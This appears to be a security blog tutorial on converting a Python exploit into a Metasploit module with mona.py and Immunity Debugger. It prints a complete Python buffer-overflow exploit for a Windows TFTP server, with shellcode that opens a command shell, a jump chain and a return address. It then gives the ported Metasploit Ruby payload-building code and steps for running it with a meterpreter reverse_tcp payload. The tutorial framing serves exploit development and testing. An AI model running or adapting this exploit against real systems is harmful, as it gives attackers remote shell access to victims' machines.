AIM -

Metasploit framework is an open source project and is quite popular amongst security analysts. Most of the current exploits are written in C, Python, Perl etc. So in order to increase the reach of the well known exploits for testing purpose, it is advisable to port them into Metasploit framework. Since Metasploit became active only in 2009, many exploits are still not converted. Here this article will enlighten the readers about the conversion from other language to Metasploit framework.

Method

To convert exploits written in python or other languages into Metasploit, we have to know the structure of the metasploit module first. The structure can be automatically generated using mona.py for any exploit type. The Immunity debugger should be installed first and afterwards the mona.py has to be put under the pycommands directory of it.

Configuring the Immunity debugger with mona

Step 1. Open the immunity debugger and type ”!mona help assemble”.

Step 2. To set the place where the exploit format file should be stored, then type “!mona config -set workingfolder d:\logs\%p”. (Create the folder logs in the d: drive)

Converting the python  exploit

Consider the python exploit given below,

import socket
import sys
host = '192.168.28.130'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # udp connection
except:
print "socket() failed"
sys.exit(1)
#msfpayload windows/shell_bind_tcp -b \x00
# this will give you the command shell of the victim
shell = (
"\xbb\x3c\xef\xdb\xc5\xdb\xdd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x4f\x31\x5a\x14\x83\xc2\x04\x03\x5a\x10\xde\x1a\x27\x2d\x97"
"\xe5\xd8\xae\xc7\x6c\x3d\x9f\xd5\x0b\x35\xb2\xe9\x58\x1b\x3f"
"\x82\x0d\x88\xb4\xe6\x99\xbf\x7d\x4c\xfc\x8e\x7e\x61\xc0\x5d"
"\xbc\xe0\xbc\x9f\x91\xc2\xfd\x6f\xe4\x03\x39\x8d\x07\x51\x92"
"\xd9\xba\x45\x97\x9c\x06\x64\x77\xab\x37\x1e\xf2\x6c\xc3\x94"
"\xfd\xbc\x7c\xa3\xb6\x24\xf6\xeb\x66\x54\xdb\xe8\x5b\x1f\x50"
"\xda\x28\x9e\xb0\x13\xd0\x90\xfc\xff\xef\x1c\xf1\xfe\x28\x9a"
"\xea\x75\x43\xd8\x97\x8d\x90\xa2\x43\x18\x05\x04\x07\xba\xed"
"\xb4\xc4\x5c\x65\xba\xa1\x2b\x21\xdf\x34\xf8\x59\xdb\xbd\xff"
"\x8d\x6d\x85\xdb\x09\x35\x5d\x42\x0b\x93\x30\x7b\x4b\x7b\xec"
"\xd9\x07\x6e\xf9\x5b\x4a\xe7\xce\x51\x75\xf7\x58\xe2\x06\xc5"
"\xc7\x58\x81\x65\x8f\x46\x56\x89\xba\x3e\xc8\x74\x45\x3e\xc0"
"\xb2\x11\x6e\x7a\x12\x1a\xe5\x7a\x9b\xcf\xa9\x2a\x33\xa0\x09"
"\x9b\xf3\x10\xe1\xf1\xfb\x4f\x11\xfa\xd1\xf9\x16\x6d\x1a\x51"
"\xf7\xea\xf2\xa0\x07\xd4\x06\x2c\xe1\x70\x17\x78\xba\xec\x8e"
"\x21\x30\x8c\x4f\xfc\xd0\x2d\xdd\x9b\x20\x3b\xfe\x33\x77\x6c"
"\x30\x4a\x1d\x80\x6b\xe4\x03\x59\xed\xcf\x87\x86\xce\xce\x06"
"\x4a\x6a\xf5\x18\x92\x73\xb1\x4c\x4a\x22\x6f\x3a\x2c\x9c\xc1"
"\x94\xe6\x73\x88\x70\x7e\xb8\x0b\x06\x7f\x95\xfd\xe6\xce\x40"
"\xb8\x19\xfe\x04\x4c\x62\xe2\xb4\xb3\xb9\xa6\xc5\xf9\xe3\x8f"
"\x4d\xa4\x76\x92\x13\x57\xad\xd1\x2d\xd4\x47\xaa\xc9\xc4\x22"
"\xaf\x96\x42\xdf\xdd\x87\x26\xdf\x72\xa7\x62")
#Stage 3 jump back 1490 bytes to the start of buffer
#stage 2 jmp 5 bytes to make a far jump
#stage 1 return address 0x00409605 TFTFPSERVER.EXE
stage4 = "\x90"*50 + shell
stage3 = "\xE9\x2E\xFA\xFF\xFF"
stage2 = "\xEB\xF9\x90\x90"
stage1 = "\x05\x96\x40"
filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
print "file created"
mode = "netascii"
youlose = "\x00\x01" + filename + "\x00" + mode + "\x00"
s.sendto(youlose, (host, port))
print "send"

Note:

  • Variable “shell” has a 330 bytes  hexa codes. These hexa codes will specify the payload to be used. The buffer size here is 1490 bytes.
  • In Stage 3, jump back 1490 bytes to the start of buffer
  • In stage 2, jump 5 bytes to make a far jump
  • In stage 1, we specify the return address 0×00409605 of TFTFPSERVER.EXE

To convert this to metasploit framework,

Step 1.      From the above python exploit we came to know that the connection type is udp and it is using 69 port numbers and it is a TFTP exploit.

Step 2.      For generating skeleton, type “!mona skeleton” in Immunity Debugger and press enter.

Step 3.      Select the exploit type as “udp” and click OK.

Step 4.      Enter the port number 69 in for the remote port and click on OK.

Step 5.      Now the skeleton is generated in “d:\logs” as msfskeleton.rb which is a ruby file. Change the name of it to whatever is appropriate

Step 6.     Enter the name of the author, description of the exploit, where it was found etc.

Step 7.     Give the spaces as 500 under payload tab in the metasploit structure. It is the maximum size of the payload to be attached (These can be found by using the immunity debugger application).

Step 8.     As we can see that a hexadecimal number is attached to the ‘stage1′ variable, which is the address that should be replaced in SIP. The address is in Big endian representation. Changing it into normal one will look like ’0×00409605′(Hexadecimal) put that into Targets array in the ruby file (in Metasploit structure).

stage << make_nops(50) + payload.encoded
stage << rand_text_alpha(1487-(payload.encoded.length+50))
stage << "\xE9\x2E\xFA\xFF\xFF"
stage << "\xEB\xF9\x90\x90"
stage << [target.ret].pack('V')
stage << "\x00"+"netascii"+"\x00"

Step 9.      In the converted part make_nops (50) position means that 50 No op instructions are inserted. The payload contains the part about the action to be performed in the victim machine

Step 10.      rand_text_alpha() will generate the random text of alphabets.

Step 11.       We add the return address and will change the address to the format required.

Running the exploits

Step 1.      Parameters to be entered are RHOST, LHOST, PAYLOAD.

Step 2.      Select the payload. Let’s select windows/meterpreter/reverse_tcp

Step 3.      Let’s exploit.

 The exploit was tested in Windows XP SP3. To run the exploit the victim system must have “TFTP SERVER V1.4 ST”.

Metasploit code is available here.

Tagged with:
 

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <p>



This site is protected with Urban Giraffe's plugin 'HTML Purified' and Edward Z. Yang's Powered by HTML Purifier. 50588 items have been purified.